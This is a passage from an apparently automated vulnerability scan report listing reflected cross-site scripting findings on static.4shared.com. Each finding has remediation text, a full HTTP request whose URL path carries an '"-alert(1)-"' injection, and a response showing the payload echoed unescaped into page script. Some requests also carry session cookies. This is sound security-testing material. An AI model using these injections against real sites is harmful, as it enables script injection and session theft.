Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css30f3d&quot;-alert(1)-&quot;0dd0c41e0d3/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2891AA2AF3FD3761E519E71601B78FFD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functi
...[SNIP]...

3.367. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b65f"-alert(1)-"5a3a52c1156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles9b65f&quot;-alert(1)-&quot;5a3a52c1156/css/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F821921AEC084A71599799BE7EB3C302.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.368. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9ab"-alert(1)-"dee60659f4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css3b9ab&quot;-alert(1)-&quot;dee60659f4a/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2401037377E5C602B65A37F6FB87A0F2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.369. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76573"-alert(1)-"ec03b530299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles76573&quot;-alert(1)-&quot;ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A9839C8DEFBDA68BADCFD7665FEA8D0.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:52 GMT
Content-Length: 36369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();

...[SNIP]...

3.370. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e355f"-alert(1)-"c59a7821a20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/csse355f&quot;-alert(1)-&quot;c59a7821a20/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7B5D4E113620780EF4F857D96ACFA259.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:57 GMT
Content-Length: 36358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.371. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ccb7"-alert(1)-"03ea243a2a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles9ccb7&quot;-alert(1)-&quot;03ea243a2a2/js/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E38EA5308504D5C33D6DD7767A3BD57.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:31 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

3.372. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da92"-alert(1)-"7b78290c6f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/js4da92&quot;-alert(1)-&quot;7b78290c6f9/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C39C846DD17D85C176855BA695E2C4C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:36 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
func
...[SNIP]...

3.373. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4d2"-alert(1)-"5f2a71056a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundlesbb4d2&quot;-alert(1)-&quot;5f2a71056a9/js/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD429EE8057B85C86EB3CF8CBFD9A936.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:06 GMT
Content-Length: 36338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.374. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83dc7"-alert(1)-"5295142c7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/js83dc7&quot;-alert(1)-&quot;5295142c7b1/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB763FE317659EF84EDC6A27F3F97ABD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.375. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/4shFeatures.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a532a"-alert(1)-"56c404f6318 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa532a"-alert(1)-"56c404f6318/4shFeatures.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa532a&quot;-alert(1)-&quot;56c404f6318/4shFeatures.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEF9E6303AEEAD94CE76A913B1A2F00C.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa532a"-alert(1)-"56c404f6318/4shFeatures.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.376. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/4shFeatures.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf1b"-alert(1)-"8d2f34b5bc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/4shFeatures.cssfaf1b&quot;-alert(1)-&quot;8d2f34b5bc1
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C45CCF983AA74A4AF3418259238DAC27.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:19 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.377. http://static.4shared.com/css/common.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498ae"-alert(1)-"582fd7f25e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css498ae"-alert(1)-"582fd7f25e7/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css498ae&quot;-alert(1)-&quot;582fd7f25e7/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=902A375A6F87ECE1509A04F2E46DBA86.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:24 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css498ae"-alert(1)-"582fd7f25e7/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.378. http://static.4shared.com/css/common.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddd86"-alert(1)-"e7244271d61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.cssddd86"-alert(1)-"e7244271d61 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/common.cssddd86&quot;-alert(1)-&quot;e7244271d61
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E72E8FA400055E4F31C2D8E5BECF0112.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:30 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/common.cssddd86"-alert(1)-"e7244271d61";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.379. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/coolbuttons.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658a0"-alert(1)-"488f25f19da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css658a0"-alert(1)-"488f25f19da/coolbuttons.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
